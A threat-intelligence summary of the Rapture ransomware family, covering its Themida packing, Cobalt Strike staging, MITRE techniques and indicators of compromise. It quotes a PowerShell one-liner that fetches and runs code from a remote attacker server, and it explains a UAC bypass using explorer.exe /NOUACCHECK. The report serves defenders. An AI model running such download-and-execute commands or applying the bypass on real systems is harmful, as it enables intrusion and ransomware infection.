Rapture is a ransomware family observed in March–April 2023 that is packed with Themida and shows similarities to Paradise yet behaves distinctly. The attackers leverage memory-based execution via a Cobalt Strike beacon, staged through PowerShell and WMI, to deploy the main ransomware quickly and stealthily. #Rapture #Paradise
Keypoints
- Rapture uses Themida packing and has RSA key configurations similar to Paradise, with .NET 4.0 requirements for execution.
- Infection appears in memory and via legitimate processes, occasionally dropping as a .log file (e.g., E:ITS.log, C:[Redacted]Aps.log).
- Ransom notes and file pattern: notes in six-character names (e.g., 7qzxid-README.txt, qiSgqu-README.txt) and encrypted files labeled with the same six characters (e.g., *.7qzxid, *.qiSgqu).
- Reconnaissance stage checks firewall policies, PowerShell version, and vulnerable Log4J applets before payload delivery.
- First-stage downloader uses PowerShell to fetch payload from a remote server, then a WMI-based second execution downloads the main Cobalt Strike beacon.
- Privilege escalation leverages CreateExplorerShellUnelevatedTask and a /NOUACCHECK bypass to drop and execute the second-stage payload.
MITRE Techniques
- [T1059.001] PowerShell – First-stage downloader uses PowerShell to download payload from a remote URL. Quote: “/c powershell set-alias -name aspersky -value Invoke-Expression;aspersky(New-Object Net.WebClient).DownloadString(‘[hxxp]://195.123.234[.]101:80/Sharepoint/Pickers.aspx’)”
- [T1047] Windows Management Instrumentation – Second execution instance is done via WMI. Quote: “the second execution instance, this time from Windows Management Instrumentation (WMI), is done via the following command:”
- [T1105] Ingress Tool Transfer – Downloads and installs the Cobalt Strike beacon after reconnaissance. Quote: “downloading and executing a PowerShell script to install Cobalt Strike in the target’s system.”
- [T1055] Process Injection – Ransomware activities injected into an existing svchost.exe (parent process) and executed via /NOUACCHECK. Quote: “the malicious actors injected the malicious activity into an existing svchost.exe, which serves as the parent process. The svchost.exe process then executes explorer.exe using the /NOUACCHECK.”
- [T1027] Obfuscated/Compressed Files and Information – Data from C2 is encrypted/beacon data sandwiched in JavaScript. Quote: “the data response from the C&C server contains the encrypted beacon sandwiched in the middle of a JavaScript file (with the script code bearing no actual usage or significance for the malware chain).”
- [T1071.001] Web Protocols – C2 communications leverage web channels with JavaScript-wrapped payloads. Quote: “the response of the C&C server is sandwiched in another JavaScript code that will be decoded by the beacon.”
- [T1548.002] Bypass User Account Control – Privilege escalation via /NOUACCHECK and CreateExplorerShellUnelevatedTask. Quote: “By default, there is a task in newer versions of Windows called CreateExplorerShellUnelevatedTask that prevents explorer.exe from running with elevated privileges. However, if explorer.exe is launched using the command line /NOUACCHECK, it inherits the elevated status from the parent process.”
Indicators of Compromise
- [IP] C2 server – 195.123.234[.]101 (examples: 195.123.234[.]101/Sharepoint/Pickers.aspx, 195.123.234[.]101/Microsoft/Online)
- [File name] Ransom note/folder markers – 7qzxid-README.txt, qiSgqu-README.txt
- [File extension] Encrypted file extensions – *.7qzxid, *.qiSgqu
- [Log file] Local drop logs – E:ITS.log, C:[Redacted]Aps.log